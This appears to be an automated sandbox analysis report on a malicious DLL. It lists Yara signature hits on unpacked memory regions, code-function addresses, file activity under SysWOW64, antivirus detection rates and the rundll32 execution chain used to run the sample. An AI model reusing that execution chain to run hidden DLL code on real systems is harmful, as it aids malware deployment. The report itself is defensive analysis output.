                      Source: Yara matchFile source: 3.2.rundll32.exe.4630000.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.rundll32.exe.3fc0000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.2.rundll32.exe.41a0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.56b0000.6.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.rundll32.exe.48e0000.8.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.5810000.8.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.5810000.8.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.3380000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.rundll32.exe.3f80000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.5840000.9.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.5970000.12.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.rundll32.exe.48b0000.7.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.rundll32.exe.30a0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.rundll32.exe.48e0000.8.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.4ea0000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.5600000.5.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.rundll32.exe.30d0000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.4f80000.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.5ac0000.15.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000007.00000002.1231555705.0000000003380000.00000040.00000010.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000002.715083656.00000000042D1000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.1232688117.0000000005A90000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.1232050333.0000000004ED1000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.712245563.00000000046E0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.712289758.0000000004711000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.1232447127.0000000005810000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.1232307431.0000000005601000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.1231756136.00000000034D1000.00000020.00000010.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.1232722292.0000000005AC1000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.1232778778.0000000005BA0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.1232026757.0000000004EA0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.1232814811.0000000005BD1000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.1232471736.0000000005841000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.1232588764.0000000005970000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.712514212.00000000048B1000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.712664698.0000000004911000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.712162779.0000000004631000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.1232613063.00000000059A1000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.712727948.0000000004A40000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.1232537029.00000000058B1000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.1232513916.0000000005880000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.1232107048.0000000004F80000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000002.714978387.00000000041A0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.711795712.0000000004040000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.710421091.00000000030D1000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.711701070.0000000003FC1000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.712440145.0000000004880000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.712583531.00000000048E0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.1232396043.00000000056E1000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.1232361987.00000000056B0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.712769808.0000000004A71000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.711647577.0000000003F80000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.710385050.00000000030A0000.00000040.00000001.sdmp, type: MEMORY

                      System Summary:

                      barindex
                      Source: spZRMihlrkFGqYq1f.dllStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
                      Source: C:\Windows\SysWOW64\rundll32.exeFile deleted: C:\Windows\SysWOW64\Feetevsox\qeijjyafbaho.gis:Zone.IdentifierJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\SysWOW64\Feetevsox\Jump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_1003F030
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_1003D322
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_100104FC
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_1003B57C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_1004C668
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_10040E8A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_030E43B3
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_030D441E
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_030ECAA8
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_030D2309
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_030D3502
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_030D251C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_030EFD10
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_030F292B
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_030D6B25
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_030D5923
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_030F0B34
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_030EF14D
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_030D3345
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_030F1343
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_030D3F5C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_030DC158
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_030E056A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_030E1F6B
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_030E577E
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_030D758F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_030E4D8D
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_030D4F8E
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_030D9384
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_030ED99A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_030EB397
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_030DFD91
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_030F1193
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_030E4BAA
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_030E2FA2
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_030E9DA1
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_030EB1B5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_030DBFB6
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_030E7BB2
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_030D6FC4
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_030F25C3
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_030DA3DF
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_030D55E8
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_030EBFE8
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_030DC5FE
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_030F03F1
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_030D8C09
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_030D1A0A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_030D220A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_030D4C00
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_030DE21C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_030DF41F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_030E1C10
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_030DEC27
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_030E5220
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_030DD223
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_030D9E22
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_030EF83F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_030F1A3C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_030DA048
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_030D3845
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_030D2A46
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_030D2043
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_030EE441
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_030D2654
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_030D9A57
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_030E406E
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_030D1C76
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_030DCC8D
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_030E4E8A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_030E748A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_030F0687
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_030D7283
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_030EAC9B
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_030DAC95
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_030D3C91
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_030ED091
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_030DDAAE
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_030E44AA
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_030ED6A7
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_030E78A5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_030DFEA0
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_030E98BD
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_030E90BA
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_030D5AB2
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_030EBEC9
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_030E0ADE
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_030ECCD4
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_030F08D1
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_030E7ED1
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_030EAEEB
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_030EECE3
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_030EDEF4
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_030D30F6
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_030EA8F0
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_042D441E
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_042ECAA8
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_042E43B3
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_042DEC27
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_042E5220
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_042DD223
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_042D9E22
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_042EF83F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_042F1A3C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_042D8C09
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_042D1A0A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_042D220A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_042D4C00
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_042DE21C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_042DF41F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_042E1C10
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_042E406E
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_042D1C76
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_042DA048
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_042D3845
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_042D2A46
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_042D2043
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_042EE441
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_042D2654
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_042D9A57
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_042DDAAE
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_042E44AA
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_042ED6A7
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_042E78A5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_042DFEA0
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_042E98BD
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_042E90BA
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_042D5AB2
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_042DCC8D
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_042E4E8A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_042E748A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_042F0687
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_042D7283
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_042EAC9B
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_042DAC95
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_042D3C91
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_042ED091
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_042EAEEB
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_042EECE3
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_042EDEF4
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_042D30F6
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_042EA8F0
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_042EBEC9
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_042E0ADE
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_042ECCD4
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_042F08D1
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_042E7ED1
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_042F292B
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_042D6B25
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_042D5923
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_042F0B34
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_042D2309
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_042D3502
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_042D251C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_042EFD10
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_042E056A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_042E1F6B
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_042E577E
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_042EF14D
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_042D3345
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_042F1343
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_042D3F5C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_042DC158
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_042E4BAA
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_042E2FA2
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_042E9DA1
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_042EB1B5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_042DBFB6
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_042E7BB2
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_042D758F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_042E4D8D
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_042D4F8E
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_042D9384
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_042ED99A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_042EB397
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_042DFD91
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_042F1193
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_042D55E8
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_042EBFE8
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_042DC5FE
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_042F03F1
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_042D6FC4
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_042F25C3
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_042DA3DF
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_04EEECE3
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_04EEDEF4
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_04ED30F6
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_04EF08D1
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_04EE7ED1
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_04EE44AA
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_04EE78A5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_04ED5AB2
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_04EE748A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_04EDAC95
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_04ED3845
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_04ED2043
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_04EDEC27
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_04EE5220
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_04EEF83F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_04ED220A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_04ED441E
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_04ED55E8
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_04EDC5FE
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_04ED6FC4
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_04EE4BAA
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_04EE2FA2
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_04EDBFB6
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_04ED758F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_04ED9384
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_04EF0B34
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_04EEAEEB
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_04EEA8F0
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_04EEBEC9
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_04EE0ADE
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_04EECCD4
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_04EDDAAE
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_04EECAA8
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_04EED6A7
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_04EDFEA0
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_04EE98BD
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_04EE90BA
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_04EDCC8D
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_04EE4E8A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_04EF0687
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_04ED7283
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_04EEAC9B
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_04ED3C91
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_04EED091
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_04EE406E
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_04ED1C76
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_04EDA048
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_04ED2A46
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_04EEE441
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_04ED2654
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_04ED9A57
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_04EDD223
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_04ED9E22
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_04EF1A3C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_04ED8C09
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_04ED1A0A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_04ED4C00
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_04EDE21C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_04EDF41F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_04EE1C10
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_04EEBFE8
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_04EF03F1
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_04EF25C3
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_04EDA3DF
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_04EE9DA1
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_04EEB1B5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_04EE7BB2
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_04EE43B3
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_04EE4D8D
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_04ED4F8E
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_04EED99A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_04EEB397
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_04EDFD91
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_04EF1193
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_04EE056A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_04EE1F6B
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_04EE577E
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_04EEF14D
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_04ED3345
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_04EF1343
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_04ED3F5C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_04EDC158
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_04EF292B
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_04ED6B25
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_04ED5923
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_04ED2309
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_04ED3502
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_04ED251C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_04EEFD10
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: String function: 1003F350 appears 44 times
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: String function: 1003EE82 appears 50 times
                      Source: spZRMihlrkFGqYq1f.dllMetadefender: Detection: 42%
                      Source: spZRMihlrkFGqYq1f.dllReversingLabs: Detection: 56%
                      Source: spZRMihlrkFGqYq1f.dllStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                      Source: C:\Windows\System32\loaddll32.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                      Source: unknownProcess created: C:\Windows\System32\loaddll32.exe loaddll32.exe "C:\Users\user\Desktop\spZRMihlrkFGqYq1f.dll"
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\spZRMihlrkFGqYq1f.dll",#1
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
